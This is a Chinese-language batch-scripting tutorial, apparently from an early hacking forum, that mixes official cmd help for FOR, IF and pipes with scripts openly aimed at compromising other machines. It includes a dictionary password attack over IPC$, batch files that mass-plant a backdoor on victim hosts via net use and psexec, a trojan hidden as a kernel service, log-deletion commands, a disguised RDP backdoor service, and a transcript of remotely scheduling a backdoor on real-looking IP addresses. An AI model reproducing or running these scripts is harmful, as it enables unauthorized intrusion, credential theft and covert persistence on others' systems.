HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。
9.If 命令
if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2、if exist 文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。
10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I
如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:
FOR /D %variable IN (set) DO command [command-parameters]
如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。
FOR /L %variable IN (start,step,end) DO command [command-para
该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
或者,如果有 usebackq 选项:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:
eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。
sample1:
FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command
会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。
%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或
'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。
您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。
最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
会枚举当前环境中的环境变量名称。
另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:
~I - 删除任何引号("),扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串
可以组合修饰符来得到多重结果:
%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR
在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。
以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。
sample2:
利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%"
/u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%"
/u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。
sample3:
你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。
主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
%%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If
errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i
%%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call
IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------
------------------- cut here then save as a batchfile(I call it door.bat)
-----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1
USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored
>>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat)
--------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.
二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password
username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三.如何使用组合命令(Compound Command)
1.&
Usage:第一条命令 & 第二条命令 [& 第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage:第一条命令 && 第二条命令 [&& 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
在做备份的时候可能会用到这种命令会比较简单,如:
dir file://192.168.0.1/database/backup.mdb && copy
file://192.168.0.1/database/backup.mdb E:\backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :)
3.||
Usage:第一条命令 || 第二条命令 [|| 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
组合命令使用的例子:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1
USER %2 PASS %3 >>victim.txt
四、管道命令的使用
1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
sample:
time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。
2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与
>>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:
运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt
dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32
/u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。
3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。
No.5
五.如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname=
WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
六.精彩实例放送。
1.删除win2k/xp系统默认共享的批处理
------------------------ cut here then save as .bat or .cmd file
---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>
c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default
properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the
command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file
---------------------------
2.全面加固系统(给肉鸡打补丁)的批处理文件
------------------------ cut here then save as .bat or .cmd file
---------------------------
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
>>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
>>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
>>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file
---------------------------
下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
>>patch.dll
@echo
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
>>patch.dll
@echo
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
>>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows' message。"
>>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
开启3389终端方法和常见问题:
第一种方法:
使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98操作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)
2:用rots.vbs开启终端服务
说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr
三:常见问题:
1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.
2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.
3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.
第二种方法:
进入后:TELNET上去!
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK
或者:
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql
echo TSEnable = on >>
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)
利用at time 获取对方服务器时间。
copy 路径:\xxx.bat \\ip地址\$c:\winnt
at time 00:00:00 xxx.bat
服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!
第三种方法:
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s file://检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s file://检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
file://这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
file://检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
问题和建议:
A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.
B 一次不行可以再试一次,在实际中很有作用.
C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
第四种方法:
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------连接成功!
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内
容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
2分钟后......
---------------------------------------------------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
---------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。
----------------------------------------------------
[server@D:\WINNT\system32]#dos
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
-----------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。
----------------------------------------------------
D:\WINNT\system32>cd..
cd..
D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615
D:\WINNT 的目录
2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节
D:\WINNT>hbulot
hbulot
---------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。
D:\WINNT>exit
exit
Command "DOS" succeed.
[server@D:\WINNT\system32]#reboot
Command "REBOOT" succeed.
[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
